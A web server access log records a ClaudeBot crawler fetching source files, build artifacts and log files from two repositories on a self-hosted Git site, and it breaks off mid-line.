-[15/Feb/2026:13:24:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3?follow_symlink=1" [Client 216.73.216.188] [Length 11090] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-4_access.log" [Client 216.73.216.188] [Length 987902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-3_access.log" [Client 216.73.216.188] [Length 277998] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log?display=rendered" [Client 216.73.216.188] [Length 11207] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_access.log?display=source" [Client 216.73.216.188] [Length 21098] [Gzip 9.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/letsencrypt-requests_access.log" [Client 216.73.216.188] [Length 968] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.html?display=rendered" [Client 216.73.216.188] [Length 10907] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/MIGRATION_GUIDE.md?display=source" [Client 216.73.216.188] [Length 20906] [Gzip 6.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images" [Client 216.73.216.188] [Length 10204] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/proxy-host-2_access.log" [Client 216.73.216.188] [Length 10079] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/README.md?display=rendered" [Client 216.73.216.188] [Length 13342] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/start.sh?display=rendered" [Client 216.73.216.188] [Length 10967] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/models.py?display=rendered" [Client 216.73.216.188] [Length 10971] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2F.Backup%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python?follow_symlink=1" [Client 216.73.216.188] [Length 11081] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/letsencrypt.log.1" [Client 216.73.216.188] [Length 9842] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/css/style.css" [Client 216.73.216.188] [Length 13198] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Header.tsx?display=rendered" [Client 216.73.216.188] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets" [Client 216.73.216.188] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/letsencrypt-requests_access.log" [Client 216.73.216.188] [Length 5722] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/proxy-host-2_access.log" [Client 216.73.216.188] [Length 1452] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_stream_access.log?display=rendered" [Client 216.73.216.188] [Length 11169] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/status.json?display=rendered" [Client 216.73.216.188] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/App.tsx?display=source" [Client 216.73.216.188] [Length 12804] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/letsencrypt.log.5" [Client 216.73.216.188] [Length 9850] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services/geminiService.ts" [Client 216.73.216.188] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/css/style.css?display=source" [Client 216.73.216.188] [Length 12681] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/ChatBot.tsx?display=source" [Client 216.73.216.188] [Length 15556] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" [Client 216.73.216.188] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/letsencrypt.log.1" [Client 216.73.216.188] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/tsconfig.json" [Client 216.73.216.188] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/README.md" [Client 216.73.216.188] [Length 9882] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/watchfiles" [Client 216.73.216.188] [Length 11539] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/metadata.json?display=rendered" [Client 216.73.216.188] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/letsencrypt.log.5" [Client 216.73.216.188] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_error.log?display=rendered" [Client 216.73.216.188] [Length 11185] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services/geminiService.ts" [Client 216.73.216.188] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/letsencrypt.log.1" [Client 216.73.216.188] [Length 39193] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-2_access.log" [Client 216.73.216.188] [Length 117479] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/tsconfig.json" [Client 216.73.216.188] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_access.log?display=source" [Client 216.73.216.188] [Length 123943] [Gzip 13.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_access.log?display=source" [Client 216.73.216.188] [Length 42904] [Gzip 12.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/README.md" [Client 216.73.216.188] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/lib64" [Client 216.73.216.188] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/letsencrypt.log.5" [Client 216.73.216.188] [Length 39264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/lib64" [Client 216.73.216.188] [Length 3] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 216.73.216.188] [Length 19884] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/vite.config.ts" [Client 216.73.216.188] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Hero.tsx" [Client 216.73.216.188] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Footer.tsx" [Client 216.73.216.188] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Contact.tsx" [Client 216.73.216.188] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/MIGRATION_GUIDE.md?display=rendered" [Client 216.73.216.188] [Length 15807] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_access.log?display=rendered" [Client 216.73.216.188] [Length 11146] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.gitignore?display=source" [Client 216.73.216.188] [Length 12227] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_access.log?display=rendered" [Client 216.73.216.188] [Length 11189] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/vite.config.ts" [Client 216.73.216.188] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Footer.tsx" [Client 216.73.216.188] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2F.Backup%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/About.tsx" [Client 216.73.216.188] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Fbin%2Fpython3" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/calculator.py" [Client 216.73.216.188] [Length 1922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Header.tsx" [Client 216.73.216.188] [Length 14842] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/calculator.py" [Client 216.73.216.188] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Services.tsx" [Client 216.73.216.188] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/App.tsx?display=rendered" [Client 216.73.216.188] [Length 10908] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Hero.tsx" [Client 216.73.216.188] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Header.tsx" [Client 216.73.216.188] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/css/style.css?display=rendered" [Client 216.73.216.188] [Length 10923] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/ChatBot.tsx?display=rendered" [Client 